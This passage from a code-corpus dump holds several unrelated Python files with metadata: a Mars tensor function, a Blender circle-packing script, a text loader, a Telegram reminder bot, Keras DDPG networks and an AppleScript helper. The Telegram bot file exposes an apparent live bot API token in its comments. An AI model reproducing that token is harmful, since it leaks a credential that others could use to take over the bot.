{"api_name": "models.Tag", "line_number": 117, "usage_type": "name"}, {"api_name": "models.Post.objects.filter", "line_number": 118, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 118, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 118, "usage_type": "name"}, {"api_name": "models.Post.objects.order_by", "line_number": 119, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 119, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 119, "usage_type": "name"}, {"api_name": "models.Category.objects.all", "line_number": 120, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 120, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 120, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 122, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 131, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 134, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 146, "usage_type": "call"}, {"api_name": "models.Post.objects.order_by", "line_number": 151, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 151, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 151, "usage_type": "name"}, {"api_name": "models.Category.objects.all", "line_number": 152, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 152, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 152, "usage_type": "name"}, {"api_name": "models.Tag.objects.all", "line_number": 153, "usage_type": "call"}, {"api_name": "models.Tag.objects", "line_number": 153, "usage_type": "attribute"}, {"api_name": "models.Tag", "line_number": 153, "usage_type": "name"}, {"api_name": "models.Post.objects.filter", "line_number": 157, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 157, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 157, "usage_type": "name"}, {"api_name": "models.Post.objects.all", "line_number": 159, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 159, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 159, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 161, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 170, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 173, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 177, "usage_type": "call"}, {"api_name": "forms.FeedbackForm", "line_number": 189, "usage_type": "call"}, {"api_name": "django.contrib.messages.add_message", "line_number": 192, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 192, "usage_type": "name"}, {"api_name": "django.contrib.messages.INFO", "line_number": 192, "usage_type": "attribute"}, {"api_name": "django.shortcuts.redirect", "line_number": 193, "usage_type": "call"}, {"api_name": "forms.FeedbackForm", "line_number": 195, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 196, "usage_type": "call"}]} +{"seq_id": "221204784", "text": "# Copyright 1999-2020 Alibaba Group Holding Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the 
License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\ntry:\n from scipy.special import rel_entr as scipy_rel_entr\nexcept ImportError: # pragma: no cover\n scipy_rel_entr = None\n\nfrom ... import opcodes as OperandDef\nfrom ...utils import require_not_none\nfrom ..utils import infer_dtype\nfrom .core import TensorSpecialBinOp\n\n\nclass TensorRelEntr(TensorSpecialBinOp):\n _op_type_ = OperandDef.REL_ENTR\n _func_name = 'rel_entr'\n\n def _is_sparse(cls, x1, x2):\n if hasattr(x1, 'issparse') and x1.issparse():\n return True\n return False\n\n\n@require_not_none(scipy_rel_entr)\n@infer_dtype(scipy_rel_entr)\ndef rel_entr(x1, x2, out=None, where=None, **kwargs):\n \"\"\"\n Elementwise function for computing relative entropy.\n\n .. math:: \\mathrm{rel\\_entr}(x, y) = \\begin{cases} x \\log(x / y) & x > 0, y > 0 \\\\ 0 & x = 0, y \\ge 0 \\\\ \\infty & \\text{otherwise} \\end{cases}\n\n Parameters\n ----------\n x : Tensor\n First input tensor.\n y : ndarray\n Second input tensor.\n\n Returns\n -------\n res : Tensor\n Output tensor.\n\n See Also\n --------\n entr, kl_div\n\n Notes\n -----\n This function is jointly convex in x and y.\n \"\"\"\n op = TensorRelEntr(**kwargs)\n return op(x1, x2, out=out, where=where)\n", "sub_path": "mars/tensor/special/rel_entr.py", "file_name": "rel_entr.py", "file_ext": "py", "file_size_in_byte": 1825, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "scipy.special.rel_entr", "line_number": 18, "usage_type": "name"}, {"api_name": "core.TensorSpecialBinOp", "line_number": 26, "usage_type": "name"}, {"api_name": "utils.require_not_none", "line_number": 36, "usage_type": "call"}, {"api_name": "scipy.special.rel_entr", "line_number": 36, "usage_type": "argument"}, {"api_name": "utils.infer_dtype", "line_number": 37, "usage_type": "call"}, {"api_name": "scipy.special.rel_entr", "line_number": 37, "usage_type": "argument"}]} +{"seq_id": "517057018", "text": "import math\nimport bpy\n\ndef slope(edge):\n a, b = edge\n ax,ay = a\n bx,by = b\n return (by - ay)/(bx - ax)\n\ndef distance(a,b):\n ax,ay = a\n bx,by = b\n return (abs((ax-bx)**2)+abs((ay-by)**2))**.5\n\ndef slopenormal(edgeslope):\n if edgeslope == 0:\n return 9e20\n return - 1/edgeslope\n\ndef norm(vec):\n ##2d norm\n vx, vy = vec\n d = (abs(vx**2)+abs(vy**2))**.5\n vx = vx/d\n vy = vy/d\n return [vx,vy]\n\ndef scalemultvec(scalar,vec):\n vx,vy = vec\n return [scalar*vx,scalar*vy]\n\ndef ltolintersect(line1,line2):\n ## line is given of the form (a,c) for instance,\n ## where y = ax + c is the form of the line equation\n a,c = line1\n b,d = line2\n return ((d-c)/(a-b),(a*d-b*c)/(a-b))\n\ndef getLine(slope,point):\n x1,y1 = point\n return (slope, y1-slope*x1)\n\ndef midpoint(edge):\n a,b = edge\n return ((a[0]+b[0])/2.0,(a[1]+b[1])/2.0)\n\ndef addvecs(vec1,vec2):\n vx1,vy1 = vec1\n vx2,vy2 = vec2\n return [vx1+vx2,vy1+vy2]\n\ndef v1equalv2(v1,v2):\n v1x,v1y = v1\n v2x,v2y = v2\n if v1x == v2x and v1y == v2y:\n return True\n else:\n return False\n\ndef computeNodePairLine(C1,C2,NodePairLine):\n ## always keyed (c1,c2)\n ## C1 and C2 keyed with tuple 
(nodeindex,(center,radius))\n    ## for circle packing center is in complex coordinates\n    ## It is important to know that CirclePacks are approximations\n    ## according to the numerical methods used for CirclePack\n    ## meaning that circles may not be perfectly and exactly tangent\n    ## in relation to one another. This means that we may need to find\n    ## medians where tangency is not completely a given.\n    ## This means that we find the tangent point on each of the circles\n    ## relative to its provided radius and test both points for position\n    ## equality where either point is furnished by vectors running\n    ## from one circle center to the other. If they are equal then both\n    ## circles are completely tangent and generally we are nearly done\n    ## computing the dual graph line (we just compute the normal slope\n    ## of such line between circle centers) and use our provided tangent\n    ## point in determining the line. Otherwise, we'd need to find\n    ## the median between either tangent point on either circle, and\n    ## then similarly compute the inverse negative (or normal slope)\n    ## of the original line between circle centers.\n    c1node, cpackc1 = C1\n    c2node, cpackc2 = C2\n    ##print('C1: ', C1)\n    ##print('C2: ', C2)\n    center1, radius1 = cpackc1\n    cx1 = float(center1.real)\n    cy1 = float(center1.imag)\n    c1 = [cx1,cy1]\n    ##print('c1: ', c1)\n    center2, radius2 = cpackc2\n    cx2 = float(center2.real)\n    cy2 = float(center2.imag)\n    c2 = [cx2,cy2]\n    ##print('c2: ', c2)\n    ## two opposite vectors c1-c2 and c2-c1\n    v1 = [cx1-cx2,cy1-cy2] ## in the direction of c1 from c2\n    v2 = [cx2-cx1,cy2-cy1] ## in the direction of c2 from c1\n    ##print('v1: ', v1)\n    ##print('v2: ', v2)\n    v1 = norm(v1) \n    v2 = norm(v2)\n    v1 = scalemultvec(radius2,v1) ## tangent point on c2 almost, right length\n    ## right direction, but vector not at the right origin\n    v2 = scalemultvec(radius1,v2) ## tangent point on c1 almost\n    ## translate vectors to their respective points of origin\n    v1 = addvecs(v1,c2)\n    v2 = addvecs(v2,c1)\n    if v1equalv2(v1,v2):\n        edge = (v1,c2)\n        m = slope(edge)\n        m = slopenormal(m)\n        line = getLine(m,v1)\n        NodePairLine[(c1node,c2node)] = line\n    else:\n        edge = (v1,v2)\n        mpoint = midpoint(edge)\n        edge = (mpoint,c1)\n        m = slope(edge)\n        m = slopenormal(m)\n        line = getLine(m,mpoint)\n        NodePairLine[(c1node,c2node)] = line\n    \nNodePairLine = {}\nTripleIntersect = {}\nvertices = []\nfaces = []\nnodetofaceind = {}\nEdgestofaces = {}\n\n## A circle pack alongside a given Complex is needed here\n\ndef gDualGraphN(Cpack,Complex,Root, NodePairLine, TripleIntersect,\n                vertices, faces, nodetofaceind, edgestofaces):\n    ## Root is the root node in which to generate dual graph\n    ## nodes.\n    ## Root nodes should only be 'interior' node from such Complex.\n    ## Complex should be in the form of corresponding Complex node keys,\n    ## irrespective of interior, exterior designations, with all nodes\n    ## having walk (cycle) neighbors indicated.\n    ## On Complex dictionary cycle walk for a root node is keyed\n    ## 'neighbors' with a list set.\n    ## Cpack should have the same corresponding node labels as Complex.\n    ## NodePairLine is a tracking dictionary to reduce computation load\n    ## by tracking what has already previously been computed.\n    ## TripleIntersect is a two level dictionary set. 
One level\n ## is given by a double node pair followed by a triple third key\n ## which is valued to the intersect vertex index (for the dual graph).\n ## This is for tracking and to avoid adding duplicate vertices.\n ## This is done by computation of double line intersections\n ## where double lines are generated from tangency point computations\n ## between each neighboring node to root and the neighboring node to\n ## neighboring node. These intersections form the dual graph vertices.\n ## All of these vertices together in a walk computation around the root\n ## node form the face of the Dual Graph of a root node. \n neighbors = Complex[Root]['neighbors']\n face = []\n for index, neighbor in enumerate(neighbors):\n\n nneighbor = None\n nindex = None\n if index == len(neighbors)-1:\n nindex = 0\n nneighbor = neighbors[0]\n else:\n nindex = index+1\n nneighbor = neighbors[nindex]\n ## first we check to see that a given node triple\n ## has not already a computed intersect vertex.\n p1 = (neighbor,nneighbor)\n p2 = (nneighbor,neighbor)\n p3 = (Root,neighbor)\n p4 = (neighbor,Root)\n p5 = (Root,nneighbor)\n p6 = (nneighbor,Root)\n u1 = (neighbor,nneighbor) in TripleIntersect\n u2 = (nneighbor,neighbor) in TripleIntersect\n u4 = (Root,neighbor) in TripleIntersect\n u5 = (neighbor,Root) in TripleIntersect\n u6 = (Root,nneighbor) in TripleIntersect\n u7 = (nneighbor,Root) in TripleIntersect\n u3 = None\n if u1:\n if Root in TripleIntersect[p1]:\n u3 = TripleIntersect[p1][Root]\n if u2:\n if Root in TripleIntersect[p2]:\n u3 = TripleIntersect[p2][Root]\n if u4:\n if nneighbor in TripleIntersect[p3]:\n u3 = TripleIntersect[p3][nneighbor]\n if u5:\n if nneighbor in TripleIntersect[p4]:\n u3 = TripleIntersect[p4][nneighbor]\n if u6:\n if neighbor in TripleIntersect[p5]:\n u3 = TripleIntersect[p5][neighbor]\n if u7:\n if neighbor in TripleIntersect[p6]:\n u3 = TripleIntersect[p6][neighbor]\n if u3 == None:\n t1 = (Root,neighbor) in NodePairLine\n t2 = (neighbor,Root) in NodePairLine \n t3 = (Root,nneighbor) in NodePairLine\n t4 = (nneighbor,Root) in NodePairLine\n\n if not t1 and not t2:\n ## compute NodePairLine and store\n C1 = (Root,Cpack[Root])\n C2 = (neighbor,Cpack[neighbor])\n computeNodePairLine(C1,C2,NodePairLine)\n if not t3 and not t4:\n ## compute NodePairLine and store\n C1 = (Root,Cpack[Root])\n C2 = (nneighbor,Cpack[nneighbor])\n computeNodePairLine(C1,C2,NodePairLine)\n line1 = None\n line2 = None\n if t2:\n line1 = NodePairLine[(neighbor,Root)]\n else:\n line1 = NodePairLine[(Root,neighbor)]\n if t4:\n line2 = NodePairLine[(nneighbor,Root)]\n else:\n line2 = NodePairLine[(Root,nneighbor)]\n triplepoint = ltolintersect(line1,line2)\n if triplepoint in vertices:\n tindex = vertices.index(triplepoint)\n else:\n vertices.append(triplepoint)\n tindex = len(vertices)-1\n face.append(tindex)\n TripleIntersect[(Root,neighbor)] = {nneighbor:tindex}\n TripleIntersect[(Root,nneighbor)] = {neighbor:tindex}\n else:\n face.append(u3)\n\n faces.append(face)\n faceind = len(faces)-1\n for ind, vi in enumerate(face):\n nn = None\n if ind == len(face)-1:\n nn = face[0]\n else:\n nn = face[ind +1]\n t1 = (vi,nn) in edgestofaces\n t2 = (nn,vi) in edgestofaces\n \n if not t1:\n edgestofaces[(vi,nn)] = faceind\n nodetofaceind[len(faces)-1] = Cpack[Root]\n\ndef generateDualGraph(pack,CPack, NodePairLine,\n TripleIntersect, vertices, faces, nodetofaceind,\n edgestofaces = Edgestofaces):\n ## pack is interior,exterior,and full complex tuple dictionary package\n interior,exterior,Complex = pack\n for node 
in interior:\n gDualGraphN(CPack,Complex,node, NodePairLine, TripleIntersect,\n vertices, faces, nodetofaceind, edgestofaces)\n verticesc = []\n for vert in vertices:\n vx,vy = vert\n verticesc.append((vx,vy,0.0))\n vertices = verticesc\n meshName = \"CirclePackingDualGraph\"\n obName = \"CirclePackingDualGraphObj\"\n me = bpy.data.meshes.new(meshName)\n ob = bpy.data.objects.new(obName, me)\n ob.location = bpy.context.scene.cursor_location\n bpy.context.scene.objects.link(ob)\n me.from_pydata(vertices,[],faces) \n me.update(calc_edges=True)\n return (vertices,faces)\n\nvertices, faces = generateDualGraph(packs[0],cpack,NodePairLine,\n TripleIntersect, vertices, faces,\n nodetofaceind)\n\n", "sub_path": "CirclePackDualGraph2.py", "file_name": "CirclePackDualGraph2.py", "file_ext": "py", "file_size_in_byte": 9997, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "bpy.data.meshes.new", "line_number": 267, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 267, "usage_type": "attribute"}, {"api_name": "bpy.data.objects.new", "line_number": 268, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 268, "usage_type": "attribute"}, {"api_name": "bpy.context", "line_number": 269, "usage_type": "attribute"}, {"api_name": "bpy.context.scene.objects.link", "line_number": 270, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 270, "usage_type": "attribute"}]} +{"seq_id": "85851974", "text": "# Kyuhong Shim 2016\n\nimport numpy as np\nimport nltk\n\n# Nietzsche text data.\n# https://s3.amazonaws.com/text-datasets/nietzsche.txt\n# Download nietzsche.txt, save as ANSI encoding.\n# Change to character-level sequences.\n\n# nltk.download()\n# Download model -> punkt\n\ndef load_nietzsche(base_datapath, mode='character'):\n nietzsche = open(base_datapath + 'nietzsche/nietzsche.txt')\n corpus = nietzsche.read()\n if mode == 'character':\n print('Corpus length: ', len(corpus))\n sequences = list(bytearray(corpus.encode('utf-8'))) \n elif mode == 'word':\n sequences = nltk.word_tokenize(corpus)\n elif mode == 'sentence':\n corpus.replace('\\n', '')\n sequences = nltk.tokenize.sent_tokenize(corpus)\n else:\n raise NotImplementedError('Not yet supported')\n print('Sequence length: ', len(sequences))\n next_sequences = sequences[1:] + [sequences[0]]\n return sequences, next_sequences # return list of characters/words/sentences\n\n\nif __name__ == '__main__':\n base_datapath = 'C:/Users/skhu2/Dropbox/Project/data/'\n sequences, next_sequences = load_nietzsche(base_datapath, mode = 'word')\n print(len(sequences), len(next_sequences))", "sub_path": "lemontree/data/nietzsche.py", "file_name": "nietzsche.py", "file_ext": "py", "file_size_in_byte": 1201, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "nltk.word_tokenize", "line_number": 21, "usage_type": "call"}, {"api_name": "nltk.tokenize.sent_tokenize", "line_number": 24, "usage_type": "call"}, {"api_name": "nltk.tokenize", "line_number": 24, "usage_type": "attribute"}]} +{"seq_id": "340049444", "text": "import logging\nimport time\nimport datetime\nimport flask\nimport telebot\nfrom parser import url\nfrom config import token\nimport schedule\nimport threading\n\n\nAPI_TOKEN = token\nWEBHOOK_URL_BASE = url #https://6dc3bd5fa35c.ngrok.io\nWEBHOOK_URL_PATH = \"/%s/\" % (API_TOKEN) #/1131808189:AAE5Qp5cSQ3EW7q4h-sj6sOZyGbLd6LT5G4/\n\nlogger = 
telebot.logger\ntelebot.logger.setLevel(logging.INFO)\nbot = telebot.TeleBot(API_TOKEN)\napp = flask.Flask(__name__)\n#### Scheduling for the scripts #########\ndef job():\n    print(\"Время 8.00\")\n    time_now = datetime.date.today()\n    time_now = time_now.strftime('%Y-%m-%d') # A string like '2020-12-01'\n    #time_now='2020-03-21'\n    print(time_now)\n    #funktion takes 2 arguments, query and id=False, and returns a list of dicts\n    m = db_question.funktion(query=time_now) # m is a dict like {'user_id': 'Birthday of Grishchenov Sergey, 21.09.1985, 35 years old', ....}\n    print('это ответ от бд{}'.format(m))\n    for elem in m:\n        print('elem', elem)\n        for key, value in elem.items(): # key = chat_id , value = '1999-12-12 birthday of Ivanov Ivan Ivanych - 34 years old\n            print('key', key)\n            print('value', value)\n            bot.send_message(key, value)\n\ndef send_messages():\n    bot.send_message('561518886', 'Привет, ')\n\nschedule.every(1).minutes.do(job)\n#schedule.every().day.at('08:00').do(job)\n#schedule.every(1).minutes.do(send_messages)\ndef go():\n    while 1:\n        schedule.run_pending()\n        time.sleep(1)\nt = threading.Thread(target=go, name=\"тест\")\nt.start()\n### End of the script-scheduling block ###\n\n\n@app.route('/html', methods=['GET', 'POST'])\ndef html():\n    return 'это моя страница'\n\n\n@app.route('/', methods=['GET', 'HEAD'])\ndef index():\n    return ''\n\n# Process webhook calls\n@app.route(WEBHOOK_URL_PATH, methods=['POST']) #WEBHOOK_URL_PATH='/1131808189:AAE5Qp5cSQ3EW7q4h-sj6sOZyGbLd6LT5G4/'\ndef webhook():\n    if flask.request.headers.get('content-type') == 'application/json':\n        json_string = flask.request.get_data().decode('utf-8')\n        update = telebot.types.Update.de_json(json_string)\n        bot.process_new_updates([update])\n        return ''\n    else:\n        flask.abort(403)\n\n\n@bot.message_handler(content_types=['text'])\ndef send_text(message):\n    chat_id=message.chat.id\n    query=message.text.lower()\n    query_list=query.split(',')\n    query_list=list(map(lambda x:x.strip(), query_list)) # Strip leading and trailing whitespace from every list element\n    query_list.append(chat_id)\n    print(query_list)\n    if len(query_list)==5 and query_list[0]=='добавить' and query_list[1].count('-')==2: # If the command is 'добавить' (add) and there is a date of the form YYYY-MM-DD\n        query_list.pop(0) # Remove 'Добавить' from the list\n        if check_date(query_list[0])==False: # Check that the date is valid\n            db_question.funktion(query, chat_id)\n            bot.send_message(message.chat.id, 'Событие добавлено')\n        else: bot.send_message(message.chat.id, check_date(query_list[0])) # If the date is bad, reply with what we did not like about it\n\n    elif len(query_list)>=2 and query_list[0]=='показать': # query_list holds two elements: ['показать', 'день рождения/фамилия'], i.e. ['show', 'birthday/surname']\n        #bot.send_message(message.chat.id, 'начинаем извлечение из бд') # the query string that follows 'показать'\n        #print('Это query list{}', query_list) #['показать', 'день рождения', 561518886]\n        m=db_question.funktion(query, chat_id) # m = [{chat_id: ['Birthday of ...',\n        print('это ответ от бд{}'.format(m))\n        for elem in m:\n            for key, answ in elem.items():\n                for elem_2 in answ:\n                    bot.send_message(message.chat.id, elem_2)\n\n    elif message.text.lower() == 'привет':\n        bot.send_message(message.chat.id, 'Привет, мой создатель')\n    elif message.text.lower() == 'пока':\n        bot.send_message(message.chat.id, 'Прощай, создатель')\n    elif message.text.lower() == 'я тебя люблю':\n        bot.send_sticker(message.chat.id, 'CAADAgADZgkAAnlc4gmfCor5YbYYRAI')\n    else:\n        bot.send_message(message.chat.id, 'Для добавления события делай такой запрос через запятую: Добавить, 2001-01-01, Иванов Иван Иваныч, Годовщина свадьбы')\n\n\ndef check_date(valid_date): #'1985-03-21'\n    valid_list_date=valid_date.split('-') #['1985', '03', '21']\n    print(valid_list_date)\n    if len(valid_list_date)!=3:\n        return 'Формат даты:ГГГГ-ММ-ДД'\n    elif len(valid_list_date[0])!=4:\n        return 'Год должен состоять из 4 цифр и быть вначале даты!'\n    elif int(valid_list_date[1]) > 12 or len(str(valid_list_date[1]))!=2:\n        return 'Месяц должен состоять из 2 цифр и быть вторым в дате!'\n    elif int(valid_list_date[2]) > 31 or len(str(valid_list_date[2]))!=2:\n        return 'День должен состоять из двух цифр и быть последним в дате'\n    else: return False\n\n\n\n# Remove the webhook first; setting a new one sometimes fails if a previous webhook is still registered\nbot.remove_webhook()\ntime.sleep(1)\n# Set webhook\nbot.set_webhook(url=WEBHOOK_URL_BASE + WEBHOOK_URL_PATH) #https://6dc3bd5fa35c.ngrok.io/1131808189:AAE5Qp5cSQ3EW7q4h-sj6sOZyGbLd6LT5G4/\n\n# Start flask server\napp.run(debug=True)", "sub_path": "testing.py", "file_name": "testing.py", "file_ext": "py", "file_size_in_byte": 6717, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "config.token", "line_number": 12, "usage_type": "name"}, {"api_name": "parser.url", "line_number": 13, "usage_type": "name"}, {"api_name": "telebot.logger", "line_number": 16, "usage_type": "attribute"}, {"api_name": "telebot.logger.setLevel", "line_number": 17, "usage_type": "call"}, {"api_name": "telebot.logger", "line_number": 17, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 17, "usage_type": "attribute"}, {"api_name": "telebot.TeleBot", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 23, "usage_type": "attribute"}, {"api_name": "schedule.every", "line_number": 40, "usage_type": "call"}, {"api_name": "schedule.run_pending", "line_number": 45, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 46, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 64, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 64, "usage_type": "attribute"}, {"api_name": "flask.request.get_data", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "attribute"}, {"api_name": "telebot.types.Update.de_json", "line_number": 66, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 66, "usage_type": "attribute"}, {"api_name": "flask.abort", "line_number": 70, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 125, "usage_type": "call"}]} +{"seq_id": "21021483", "text": "import numpy as np\nimport math\n\nfrom keras.initializers import normal, identity\nfrom keras.models import Sequential, Model, model_from_json, load_model\nfrom keras.layers import Dense, Flatten, Input, merge, Lambda,concatenate, Activation,add\nfrom keras.optimizers import Adam\nimport keras.backend as k\n\nimport tensorflow as tf\n\nn_H1 = 300\nn_H2 = 600\n\nclass CriticNetwork(object):\n    def __init__(self, sess, state_size, action_size, tau, lr):\n        k.set_session(sess)\n        self.sess = sess\n\n        self.tau = tau\n        self.lr = lr\n\n        self.action_size = action_size\n        self.model, self.action, self.state = self.create_critic_network(state_size, action_size) \n        
self.target_model, self.target_action, self.target_state = self.create_critic_network(state_size, action_size) \n self.graph = tf.get_default_graph()\n self.action_grads = tf.gradients(self.model.output, self.action)\n self.sess.run(tf.global_variables_initializer())\n #self.sess.run(tf.initialize_all_variables())\n\n def gradients(self, states, actions):\n return self.sess.run(self.action_grads, feed_dict={self.state: states, self.action: actions })[0]\n\n def target_train(self):\n critic_weights = self.model.get_weights()\n critic_target_weights = self.target_model.get_weights()\n for i in range(len(critic_weights)):\n critic_target_weights[i] = self.tau * critic_weights[i] + (1 - self.tau)* critic_target_weights[i]\n self.target_model.set_weights(critic_target_weights)\n\n def create_critic_network(self, state_size,action_dim):\n S = Input(shape=[state_size]) \n A = Input(shape=[action_dim],name='action2') \n\n w1 = Dense(n_H1, activation='relu')(S)\n a1 = Dense(n_H2, activation='linear')(A) \n h1 = Dense(n_H2, activation='linear')(w1)\n h2 = add([h1,a1]) \n h3 = Dense(n_H2, activation='relu')(h2)\n\n V = Dense(action_dim,activation='linear')(h3) \n model = Model(inputs=[S,A],outputs=V)\n\n adam = Adam(lr=self.lr)\n model.compile(loss='mse', optimizer=adam)\n return model, A, S \n\nclass ActorNetwork(object):\n def __init__(self, sess, state_size, action_size, tau, lr):\n self.sess = sess\n self.tau = tau\n self.lr = lr\n\n k.set_session(sess)\n\n self.model , self.weights, self.state = self.create_actor_network(state_size, action_size) \n self.target_model, self.target_weights, self.target_state = self.create_actor_network(state_size, action_size) \n self.graph = tf.get_default_graph() \n self.action_gradient = tf.placeholder(tf.float32,[None, action_size])\n self.params_grad = tf.gradients(self.model.output, self.weights, -self.action_gradient)\n\n grads = zip(self.params_grad, self.weights)\n self.optimize = tf.train.AdamOptimizer(lr).apply_gradients(grads)\n self.sess.run(tf.global_variables_initializer())#tf.initialize_all_variables())\n\n def train(self, states, action_grads):\n self.sess.run(self.optimize, feed_dict={self.state: states, self.action_gradient: action_grads})\n\n def target_train(self):\n actor_weights = self.model.get_weights()\n actor_target_weights = self.target_model.get_weights()\n for i in range(len(actor_weights)):\n actor_target_weights[i] = self.tau * actor_weights[i] + (1 - self.tau)* actor_target_weights[i]\n self.target_model.set_weights(actor_target_weights)\n\n def create_actor_network(self, state_size, action_dim):\n initializer = normal(mean=0,stddev=1e-4)\n\n S = Input(shape=[state_size],name='input_1') \n h0 = Dense(n_H1, activation='relu',name='dense_1')(S)\n h1 = Dense(n_H2, activation='relu',name='dense_2')(h0)\n\n Steering = Dense(1,activation='tanh',use_bias=True,kernel_initializer=initializer,name='dense_3')(h1)\n Acceleration = Dense(1,activation='sigmoid',use_bias=True, kernel_initializer=initializer,name='dense_4')(h1)\n Brake = Dense(1,activation='sigmoid',use_bias=True,kernel_initializer=initializer,name='dense_5')(h1)\n\n V = concatenate([Steering,Acceleration,Brake],axis=-1,name='merge_1') \n model = Model(input=S,output=V)\n \n return model, model.trainable_weights, S", "sub_path": "code/networks_ddpg.py", "file_name": "networks_ddpg.py", "file_ext": "py", "file_size_in_byte": 4309, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "keras.backend.set_session", 
"line_number": 17, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 17, "usage_type": "name"}, {"api_name": "tensorflow.get_default_graph", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.gradients", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 42, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 43, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 45, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 46, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 47, "usage_type": "call"}, {"api_name": "keras.layers.add", "line_number": 48, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 49, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 51, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 52, "usage_type": "call"}, {"api_name": "keras.optimizers.Adam", "line_number": 54, "usage_type": "call"}, {"api_name": "keras.backend.set_session", "line_number": 64, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 64, "usage_type": "name"}, {"api_name": "tensorflow.get_default_graph", "line_number": 68, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.gradients", "line_number": 70, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 73, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 73, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 74, "usage_type": "call"}, {"api_name": "keras.initializers.normal", "line_number": 87, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 89, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 90, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 91, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 93, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 94, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 95, "usage_type": "call"}, {"api_name": "keras.layers.concatenate", "line_number": 97, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 98, "usage_type": "call"}]} +{"seq_id": "121570356", "text": "# !/usr/bin/python\n# coding: utf-8\nimport logging\nimport timeit\nfrom subprocess import Popen, PIPE\n\n\ndef log_func(func):\n def wrapper(*args, **kwargs):\n t0 = timeit.default_timer()\n result = func(*args, **kwargs)\n elapsed = timeit.default_timer() - t0\n arg_str = ', '.join(repr(arg) for arg in args)\n\n logging.info('[%0.8fs] %s (%s)==%s' % (elapsed, func.__name__,arg_str, result))\n return result\n\n return wrapper\n\n\ndef applescript_call(src):\n\n p = Popen(['osascript', '-'], stdin=PIPE, stdout=PIPE, stderr=PIPE, universal_newlines=True)\n stdout, stderr = p.communicate(src)\n if len(stderr) > 0:\n logging.error(\"apple script src:\\n%s\\n\" % src)\n logging.error(\"apple script error:\\n%s\\n\" % stderr)\n raise Exception(stderr)\n print(stdout)\n # 